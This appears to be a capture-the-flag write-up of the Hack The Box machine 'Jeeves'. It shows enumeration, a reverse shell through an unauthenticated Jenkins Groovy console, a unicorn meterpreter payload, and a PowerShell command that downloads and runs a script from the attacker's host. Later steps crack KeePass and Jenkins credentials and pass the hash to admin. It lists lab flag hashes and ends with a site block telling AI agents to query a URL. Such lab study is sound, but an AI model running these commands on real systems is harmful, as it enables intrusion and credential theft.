# Jeeves

## Jeeves - 10.10.10.63

### Target Enumeration:

OS: Windows

IP: 10.10.10.63

User Hash: e3232272596fb47950d59c4cf1e7066a

Root Hash: afbc5bd4b615a60648cec41c6ac92530

### Ports / Services / Software Versions Running

80/tcp    open http         syn-ack ttl 127 Microsoft IIS httpd 10.0

135/tcp   open msrpc        syn-ack ttl 127 Microsoft Windows RPC

445/tcp   open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

50000/tcp open  http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT

Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

### Vulnerability Exploited:

Jenkins /script enabled unauthenticated on port 50000

### Privilege Escalation

Administrator hash stored in keepass file with weak password.

### Replicating the exploit:

Nmap TCP

![](https://lh5.googleusercontent.com/VUik2C-zIMI5ZFDWUmpQIKrD0dhbMEveVI4P0LDl6ik9TxtNTatR9Uv5Mruad1ULb2-kq22UXNHc4_bl0MYcp4Pch36c4hvoBzeAzJJ0hVXESd-ftx1eHogd6Qyvuy6iHUZr0m2u)

Nmap UDP:

![](https://lh4.googleusercontent.com/SkQlCL2Hv-ngkw7cctqSkMqeiz2YV4y2rK2D5uJTCBZliUPoiaEpoO9NjNmZOel0qPyE2XVrOw8Fd9VrU6TC_KF0zm6FnhcE9dfQHxIltIiIsDamXTOKezDNvHywyq_T5m9yMIL2)

Nikto:

Port 80

![](https://lh6.googleusercontent.com/b7PkrhCumIEmuabh9s2U4hjXKq6ShhrGrpRoN-0OPoIUNh31ffbFT1zJzI__mE3xB3w-mNODpEZAupp6K361RtaoGJ0eaZs8k3sPoSgoJgVrFKYCk5Ha-iD66o84psPOeWHb0HUA)

Port 50000

![](https://lh3.googleusercontent.com/pR8rtVsYExo2ewtFpXKYUKZI5FifclmLfoNDitT1qgBWYFYDnSSUC0qlsg26Bo5WCZgcnuQZ5F9JAut8wz0gJDgRsboA7VUcV3-RY_835VB-oevl5wHrEdwgWIW0_oXwUxJuHy5P)

Dirb:

Port 80

<div align="left"><img src="https://lh6.googleusercontent.com/4O4blr6Plk0dIlYIuWX-yLSCgw-0kHMoV8uWUyb1l4thMjqtW7S2sDQ5ioeTj0btXkY0t-kv1XBEc_hdFqLUdvxamaDFdgfwqhQkG0ZoeDbfN_rMTktGQkgrlgv4JM6jcZbgiygQ" alt=""></div>

Port 50000 brings back nothing.

<div align="left"><img src="https://lh6.googleusercontent.com/WiO4ulMYTVCBbVvGaI9QS_k11smDiwC8Ayd34S97EnY0eT9ul5uF9UPxjnMQrj5dZAv6e76BsFuCZeyS8qHTlHwVanZW_FAtX1ojH_y4oUMyAFpRuE8pPQmftHEIpq-mXiwe_c0b" alt=""></div>

Dirbuster

![](https://lh5.googleusercontent.com/yE7mdI_mKPHOT7Aub9t_45by_bathUkKc_KcInfrlPgIVHYvLwHmtVR6OkG2LWs8p3v1FmsNr2togyJNdJTZpSTJYDTO4y3zwUbmGtwYAP6-961_nGztheG_g4SGXAf4fIST6gNW)

Nothing found on port 50000.

/askjeeves on port 50000

Enum4linux brought back nothing

Browsed to port 80 and it is a search bar which always gives you this:

![](https://lh5.googleusercontent.com/FPt-fhAH61HK4JvquOiQi035BcERG5AK5vgcnPiHlLiBrIG-fTruxVaGSvjzekDCXrPl282OiLoQn3qm4Jr8LXYqnrtb1PWgEd6sIFV_AkWvK6FHFGygvxq5VG5qO9bELGp7OrOi)

Source code:

![](https://lh4.googleusercontent.com/T1VnAspvCGfOSDkTP9HajXBg0GE3-7E6uU7pESb7yA5MwU84EcWYHr0IalM-tD4Tb0mk4EyKXX6ugnGyDUpbONKp9-GR2awWBp_qyWSeqeZE4ywfPYxjJyK1saWob4sXKISmWIk_)

Response from initial web page.

<div align="left"><img src="https://lh3.googleusercontent.com/-n4LEJkPOswgH4J4yXWp51onxymsD3T4pMFifWKBL5ialnDOVFPPt7FUlM4Jx2ZSr1SjI3qMMvUghR3kaEFpKH_taw7X-k-Vpp942VcdrfrgFsZjfo42JpipW3ahpyk91Ssp0kke" alt=""></div>

Downloaded image and ran image though strings and binwalk which brought back nothing.

<div align="left"><img src="https://lh5.googleusercontent.com/gtres__0bBTASANQ2IRv8iDgH-GSKZ4BGk9NSX1_XUygc42G-YxWQ4SOh97_zv7GVQxpXmAlisD3HiD-vRdePKQqCe5VTn1fbDHTuZaPRFEoaVF3Bd0gezX2-3pRhFzmJMeevxPO" alt=""></div>

This is an image not a verbose error message which suggests it could be a troll.

Downloaded the main image and checked it to see if it had anything in it with strings.

Browsed to port 50000 and you get this:

<div align="left"><img src="https://lh4.googleusercontent.com/Yc4VRbVxBf4AvVU2-zy5Tblh8vXmg6ylUx7uMur1k9VtOiGkvwAMU5OecFk8ufe-6IjMDrFBBgHgSJqEimFYeCwh4kX_J3PvGTzjvEVlAiNgTfYPkDPpK-S_9AhsWQoNfpIdatHB" alt=""></div>

Potential software version: Jetty:// 9.4.z-SNAPSHOT

<https://www.exploit-db.com/exploits/36318/>

dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63

Also tried

<https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html>

Not vulnerable<br>

![](https://lh6.googleusercontent.com/kgju4rEnVMHEPMqvzOrS837ycckQDqCwqoTgUMP_S6VJTzUhLoOcfA0egQfRx5OhteHTCBD43HgkxYrbJ0tlk6fn_KIO8M3hrUV2PJBm50Mb2KAklu7tHiqbna6HonhECYesXekF)

Come back to this.

Finally found some dirs

<div align="left"><img src="https://lh4.googleusercontent.com/zqfvkUD5hJy_pjB31IRt960SN1vpFjPHi47K0X5u9IQKEq-7REjXhDjIlakSPHB8E3_9Ip4aDL0EE3OuFoIQJ2aYFm4fLZi-Np6joLtw-wHSY4_DmnQocN4hkpjmvMMSOpSfXwhn" alt=""></div>

Dirbuster

<div align="left"><img src="https://lh6.googleusercontent.com/fxCS0nYJYcLIgwQbgfPwAG-3O4g9lpZijwi6hVscrYZa4ap-nDU05eKgF0xv12l1WcxKFfuK5egi821pVuq8KXNA8erpWz4BpfNZzGqBDSoYFKucZz1qX2s0eR7mhRlP1301iEU0" alt=""></div>

![](https://lh3.googleusercontent.com/1sCsr5URsanpzbeQ5i5Lrjgh1AEaOGS1rje-mXBCoXVDeDlRz4-nvCNo0pIHESW2P49uPNKpfqc8BhN6JmPGw_nvDU-YJp7KD8XtGFuPVuUbKvVofBVNpSzkkD_1I2ly2lWlTfkt)

<div align="left"><img src="https://lh3.googleusercontent.com/YqTbcqVqo7y1u5quPuO0NARzdmTDWjqEx0djGsKGCPuc1dIqe5CK4zoLejXwbpFwWaxPJvdMXOPC9wJW3TRg7swPH3VklskQ333w9Oz-nXw5p3HyHe5egkzOQsx5Fc2tVUHmKCvj" alt=""></div>

<div align="left"><img src="https://lh4.googleusercontent.com/5GeqcSXQXN9S64IPMRq4IGsV-43azpzVxdZNH8iVX6wENqkXjJc2E-OpM5qbVIDNHDy8svdR_-mf3mCpidIUzSWz7EOAHS68LmyYnNPofu0VVcCKYmpocASwBX4vpmYX91HbRpoN" alt=""></div>

<div align="left"><img src="https://lh4.googleusercontent.com/5QDmC5g9WkbURBJVAOWllYH5QzgoCI90F85wWbnbGjywkhtQAM6gpKTnS91OS2Qh5np23jFbOVLxub-or6-mzZbY714SW2e5WJ49HNDk7pVnffdjEWf_SZsz-THszY5SH05Uzetw" alt=""></div>

Searchsploit brought back:

<div align="left"><img src="https://lh4.googleusercontent.com/0y2cDJ78BppKS0G2_HXlxhk14sAozq1uoGqf7qWqWExxVLQ_ormhghqBiO1oLTI8hIUjP-wod6npH1A_0ZZ2fOvfBBHBn9d2_hAfqZfyQY1LaF_5AQNS3cCy_aFvoocY6CI1ko_P" alt=""></div>

Metasploit brought back

![](https://lh3.googleusercontent.com/Tk-M1DTH1X0vYTptrhmhLvOTeBAm0K9-cyhf5xsqYGux1-20yWovTrHi3WVXXCvdkEzpygP9Ew27C_5yuG_6ulsRxbBThNo2FaKz-puxeaY0P0Jn3NVFSnDydRrNERrTAXAFJJ1f)

None of them worked.

Found a way to execute commands via groovy script on webserver:

Found rvshell.groovy

<https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76>

Download to system with github and modify

![](https://lh6.googleusercontent.com/EitVLRuZQFalkM1ZO7eiazZ_iW9lEMQkDV9fb0LxvRdM3xEAK2pABhpG3lK0-GgxtjTAEFJtP9m1z79MRac4stWMWIOAPEWgW9MwuN9oy0b1LJ0EAWwTvmr3KXQJlbF6XYk3M6g9)

Paste into the scriptconsole

![](https://lh4.googleusercontent.com/qIiJGCF5ec9Nr2MOAPQXZpJidtwBBqsdUccmdt3aKw7mJMzX_g7914LiTdL4qMiRVjdD7veq3boV36FaSGKDLrjqKgcZQKS0ksCxIQBLcb0iIJK6CgDQw5-Ppkaq5dWdq51IjRDA)

Execute with 443 listening.

<div align="left"><img src="https://lh6.googleusercontent.com/lM8RYKoMc7rivbsZ-tK3IUkuW9pWJ4kqHE22LrsEeOfVFcQyf2tm36GcGiztJwzB2KydwSPrFoG1RmUC0ZAtIighuWZJSUgsWGqdNbD0fQs2lTxbRCPxMfUdXEzpupeF_XZFXTox" alt=""></div>

Use the following code to download files to the system

Convert to a meterpreter shell

```
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.1 443
python -m SimpleHTTPServer 80
```

\
In new tab

```
mv powershell_attack.txt Shell.ps1
msfconsole -r unicorn.rc
```

On victim machine from a command prompt.

```
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"
```

Run local exploit suggester against the host

Drop into a shell and download tools

![](https://lh6.googleusercontent.com/QmOYmrvMy1J3CyzXqZ7IbvXFeQ6b_XevIhhYfEFqGtOygIU9bEpcgM39P72aNWPk5O9bYMMJyZthOW8AzO6xJNtjMCqx_cBNHZ3LIw2ISsubeZQlfDq4ZUy5tEWvhh11DdEcLBG9)

PowerUp.ps1

![](https://lh5.googleusercontent.com/kFiK_huONR6myZLFZxRDmO6mWl7loyGXfJ4dU9GheKDpkCpdR4xAiJ5ie0bXlbry2lYJP4r2GSyZSftFkvRi2SQrc3iu1a92k96gBzi1N2CRKLjlc-75GSGSoF2BC1DAgG9jTvJV)

Service found

![](https://lh4.googleusercontent.com/EQywO4a5BydSYU6JIbciyFG_o4u-nOOPQ8LwbgyPH9BBtiS3EwopV1Tk_Nchv5in4S-ThQjFEJ8ajHFFSfSC4En0Sbti4J2Ko-UeTADC79PLIIkMbAp02EU1ralMtSmSo8brdEu9)

No exploits worked so far so start digging around the system

We found the following credentials in credentials.xml in the jenkins dir.

![](https://lh6.googleusercontent.com/7ngaECPtHj8C07xm-3qH3v78zkczU1oQJVQRYty-tGoZZ8NpBNs9Il49cKIgLcxEzujKxAKQtx0Ss2Diel5jbNNfnhe2qM4qcSKHQKWLXBJZnvlPyh6tUjw7IK0WyV5scGvqfRtx)

These are encrypted so run the following via the /script dir on the webserver and you get the password admin:

![](https://lh5.googleusercontent.com/3kj8LcrZOv-hdE0qhRux2fXWvEiSH3ARAzYzs2-A0Ot_FO2-VWMDXHqfi-r30XsHTSDDbzi9Aw7Ul4qrBe_suAnKnvajD6qANMA0BLY2WOueBRPFMURQWGYdi4WPa9VO-JCrgAht)

Search for other passwords

<div align="left"><img src="https://lh4.googleusercontent.com/63Mw77MAvs_stRfQhxfJmGrHf50w1WVxY-cOnxyUbTVLIUdDkdbAqDhzrdmwh70IZTOJaz7dW9VDvIXNhoOx-gTZGu5QRC0nL1YP_L1s8eJzZiblUFyEQRV8f1RdJ3OzTLRiq8UC" alt=""></div>

This once cracked gives you admin:admin which is of no use for privesc.

Digging around the file system we find a keepass file called CEH

Download the file locally and decrypt the password

<div align="left"><img src="https://lh4.googleusercontent.com/c1MeXWnyttMZHgFkHENvJpANqCJ9w3Ibx3p-rw3I3HXktu1T4Gq9E75fdFf1q_zK1e8VzQ7Fq1ekmgTUG1k2pPPPQ6kJDaWIUqlKGWl0bnbk054JOfDrA1usP-jx9D6rpv9FWfoK" alt=""></div>

Install kpcli

apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl

Inspect all of the entries

<div align="left"><img src="https://lh3.googleusercontent.com/nNvXNB0WW5PfdZotLeXLqszMrlbSttQJhfnXFvwWZg9qqxB1DasMt7gb2At5n9VKOd4jY2Atpzai4ssQxOB4N5IpLuBqlI7EH-0YueNMB-xqSXaaLfv0DK1oedPUOUm6mIA2Bc5l" alt=""></div>

Looks like a ntlm hash

<div align="left"><img src="https://lh5.googleusercontent.com/_Hmf0wulind6L9l71c5xL66E5OFZYZ41IPFrRA4lIuqU0xzy8RYPM1DPu_WjO09HA4JYJAzI-OhVzcDR3cEw5SHvSveV2Q1m5-O7YL5OAw7RDZ3SQJVI_Nh6p_f_WipkOPSLUZL2" alt=""></div>

Use passthehash to login to the system

<div align="left"><img src="https://lh6.googleusercontent.com/jDapmOCHjcKrlz4i3BQpRmM48-C069gyDkfwoaASxhhkbGpAgV_6Kwr5kb4MLHRoJqbETkNN_hLs49YehRj7YCb9rVNCk1NL4qfArqTnJGpkm5Jh6T_YfCbbAa-rNldAMnZyG7x4" alt=""></div>

Upload a windows shell via our low priv account and execute via pth-winexe

<div align="left"><img src="https://lh6.googleusercontent.com/NlHki3kKkJLM9d9ZTpwIl5jny33GEIRFHBn6VvXABEFfp4lm7q3hutLm7qUsbLEzH9MTdGMkq4H98wfgkqc_FDeEkEYSzDXZ5Y0xRV7ZQnBItxm63yLGaN4Fp10xk_D1df0Hst97" alt=""></div>

Interact with the meterpreter shell

<div align="left"><img src="https://lh6.googleusercontent.com/-tpxmR98tgf122q-OQ_hPmUgV6FoQgiC0WwQ8fFkDKooQpfAXYzorAZH7Hf4Ilrzk09IKNB5ueiVSIMLWm4MqcabSU8mf10xoCm8RfpHv-VFuQD-Zv0uXiWZEz6E7FYfTeckl4JR" alt=""></div>

Grab your flags:

<div align="left"><img src="https://lh4.googleusercontent.com/AfMW6lWITodi0OAiQrOU04WDlORROZKHycH0liYk5CDfEzedXfMBolL3hpOcZokHPIuaPmGbYMxED8W9YiUT6E3zJNXmsArXXi06wR1EaxVZ4v8qIfPQwkwgJi3cg0hHVqOINufl" alt=""></div>

View the data stream to read the root flag:

<div align="left"><img src="https://lh4.googleusercontent.com/8isUHhxWBu3VWOFBSdM3ykFh6r3eYsxVgpzFyqX0TFv0aI_N3qxRlko_c5uqbxIK6id2pj9R9eh_rLjpNHpwOLtvxfrzI_IAvoZAyMMxKnKuwFw93kISQMfJrWbZ2RL1-78RZt04" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/jeeves.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.